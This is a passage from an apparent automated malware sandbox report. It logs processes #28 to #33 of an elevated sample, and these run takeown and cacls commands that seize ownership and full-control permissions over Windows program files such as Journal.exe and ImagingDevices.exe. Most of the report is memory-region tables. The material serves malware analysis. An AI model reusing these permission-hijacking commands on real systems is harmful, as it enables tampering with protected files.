| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "Journal.exe" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
3 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "Journal.exe" |
|
1 |
Process #28: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #28 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:58, Reason: Child Process |
| Unmonitor | End Time: 00:02:00, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb5c |
| Parent PID | 0xea4 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
5D8
0x
574
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000710000 | 0x00710000 | 0x0072ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000730000 | 0x00730000 | 0x00731fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000740000 | 0x00740000 | 0x00753fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000760000 | 0x00760000 | 0x0079ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007a0000 | 0x007a0000 | 0x007dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000007e0000 | 0x007e0000 | 0x007e3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007f0000 | 0x007f0000 | 0x007f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000800000 | 0x00800000 | 0x00801fff | Private Memory | rw |
|
|
|
- |
| cacls.exe | 0x00830000 | 0x00839fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000840000 | 0x00840000 | 0x0483ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004880000 | 0x04880000 | 0x0488ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f500000 | 0x7f500000 | 0x7f522fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f527000 | 0x7f527000 | 0x7f527fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f529000 | 0x7f529000 | 0x7f529fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f52d000 | 0x7f52d000 | 0x7f52ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #29: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #29 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Journal\Templates\blank.jtp" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:59, Reason: Child Process |
| Unmonitor | End Time: 00:02:04, Reason: Self Terminated |
| Monitor Duration | 00:00:05 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x73c |
| Parent PID | 0x40 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
744
0x
14C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00210000 | 0x0021ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x00000000003b0000 | 0x003b0000 | 0x043affff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00000000043b0000 | 0x043b0000 | 0x043cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000043b0000 | 0x043b0000 | 0x043bffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000043c0000 | 0x043c0000 | 0x043c3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000043d0000 | 0x043d0000 | 0x043d1fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x043d0000 | 0x043d4fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000043e0000 | 0x043e0000 | 0x043f3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004400000 | 0x04400000 | 0x0443ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004440000 | 0x04440000 | 0x0447ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004480000 | 0x04480000 | 0x04483fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004490000 | 0x04490000 | 0x04490fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000044a0000 | 0x044a0000 | 0x044a1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x044b0000 | 0x0456dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004570000 | 0x04570000 | 0x04570fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004580000 | 0x04580000 | 0x04580fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004590000 | 0x04590000 | 0x0459ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000045a0000 | 0x045a0000 | 0x0469ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000046a0000 | 0x046a0000 | 0x046dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000046e0000 | 0x046e0000 | 0x0471ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000047c0000 | 0x047c0000 | 0x047cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000047d0000 | 0x047d0000 | 0x04957fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004960000 | 0x04960000 | 0x04ae0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004af0000 | 0x04af0000 | 0x05eeffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x05ef0000 | 0x06226fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74740000 | 0x74767fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f0c0000 | 0x7f0c0000 | 0x7f1bffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f1c0000 | 0x7f1c0000 | 0x7f1e2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f1e7000 | 0x7f1e7000 | 0x7f1e7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f1e9000 | 0x7f1e9000 | 0x7f1ebfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f1ec000 | 0x7f1ec000 | 0x7f1eefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f1ef000 | 0x7f1ef000 | 0x7f1effff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #30: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #30 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:59, Reason: Child Process |
| Unmonitor | End Time: 00:02:04, Reason: Self Terminated |
| Monitor Duration | 00:00:05 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x854 |
| Parent PID | 0xe18 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
2FC
0x
C3C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00210000 | 0x0021ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000690000 | 0x00690000 | 0x0468ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004690000 | 0x04690000 | 0x046affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004690000 | 0x04690000 | 0x0469ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000046a0000 | 0x046a0000 | 0x046a3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000046b0000 | 0x046b0000 | 0x046b1fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x046b0000 | 0x046b4fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000046c0000 | 0x046c0000 | 0x046d3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000046e0000 | 0x046e0000 | 0x0471ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004720000 | 0x04720000 | 0x0475ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004760000 | 0x04760000 | 0x04763fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004770000 | 0x04770000 | 0x04770fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004780000 | 0x04780000 | 0x04781fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004790000 | 0x04790000 | 0x047cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000047d0000 | 0x047d0000 | 0x0480ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004810000 | 0x04810000 | 0x04810fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004820000 | 0x04820000 | 0x04820fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004840000 | 0x04840000 | 0x0484ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04850000 | 0x0490dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004a00000 | 0x04a00000 | 0x04afffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004b00000 | 0x04b00000 | 0x04c87fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004cd0000 | 0x04cd0000 | 0x04cdffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004ce0000 | 0x04ce0000 | 0x04e60fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004e70000 | 0x04e70000 | 0x0626ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x06270000 | 0x065a6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74740000 | 0x74767fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f270000 | 0x7f270000 | 0x7f36ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f370000 | 0x7f370000 | 0x7f392fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f398000 | 0x7f398000 | 0x7f398fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f399000 | 0x7f399000 | 0x7f39bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f39c000 | 0x7f39c000 | 0x7f39efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f39f000 | 0x7f39f000 | 0x7f39ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #31: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #31 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:59, Reason: Child Process |
| Unmonitor | End Time: 00:02:04, Reason: Self Terminated |
| Monitor Duration | 00:00:05 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x300 |
| Parent PID | 0xd74 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
7DC
0x
FBC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00210000 | 0x0021ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000df0000 | 0x00df0000 | 0x04deffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004df0000 | 0x04df0000 | 0x04e0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e10000 | 0x04e10000 | 0x04e11fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004e20000 | 0x04e20000 | 0x04e33fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004e40000 | 0x04e40000 | 0x04e7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e80000 | 0x04e80000 | 0x04ebffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004ec0000 | 0x04ec0000 | 0x04ec3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004ed0000 | 0x04ed0000 | 0x04ed0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004ee0000 | 0x04ee0000 | 0x04ee1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005020000 | 0x05020000 | 0x0502ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e7d0000 | 0x7e7d0000 | 0x7e7f2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e7f4000 | 0x7e7f4000 | 0x7e7f4fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e7fc000 | 0x7e7fc000 | 0x7e7fcfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e7fd000 | 0x7e7fd000 | 0x7e7fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #32: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #32 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Journal\Journal.exe" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:00, Reason: Child Process |
| Unmonitor | End Time: 00:02:01, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb1c |
| Parent PID | 0x768 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
FC0
0x
A98
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cacls.exe | 0x00830000 | 0x00839fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000fd0000 | 0x00fd0000 | 0x04fcffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004fd0000 | 0x04fd0000 | 0x04feffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ff0000 | 0x04ff0000 | 0x04ff1fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000005000000 | 0x05000000 | 0x05013fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000005020000 | 0x05020000 | 0x0505ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005060000 | 0x05060000 | 0x0509ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000050a0000 | 0x050a0000 | 0x050a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000050b0000 | 0x050b0000 | 0x050b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000050c0000 | 0x050c0000 | 0x050c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000051e0000 | 0x051e0000 | 0x051effff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f390000 | 0x7f390000 | 0x7f3b2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f3b8000 | 0x7f3b8000 | 0x7f3b8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f3ba000 | 0x7f3ba000 | 0x7f3bafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f3bd000 | 0x7f3bd000 | 0x7f3bffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #33: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #33 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:00, Reason: Child Process |
| Unmonitor | End Time: 00:02:04, Reason: Self Terminated |
| Monitor Duration | 00:00:04 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x644 |
| Parent PID | 0xea4 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
8E8
0x
A88
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00210000 | 0x0021ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000ea0000 | 0x00ea0000 | 0x04e9ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004ea0000 | 0x04ea0000 | 0x04ebffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ec0000 | 0x04ec0000 | 0x04ec1fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004ed0000 | 0x04ed0000 | 0x04ee3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004ef0000 | 0x04ef0000 | 0x04f2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f30000 | 0x04f30000 | 0x04f6ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004f70000 | 0x04f70000 | 0x04f73fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004f80000 | 0x04f80000 | 0x04f80fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004f90000 | 0x04f90000 | 0x04f91fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005170000 | 0x05170000 | 0x0517ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f350000 | 0x7f350000 | 0x7f372fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f376000 | 0x7f376000 | 0x7f376fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f37c000 | 0x7f37c000 | 0x7f37efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f37f000 | 0x7f37f000 | 0x7f37ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
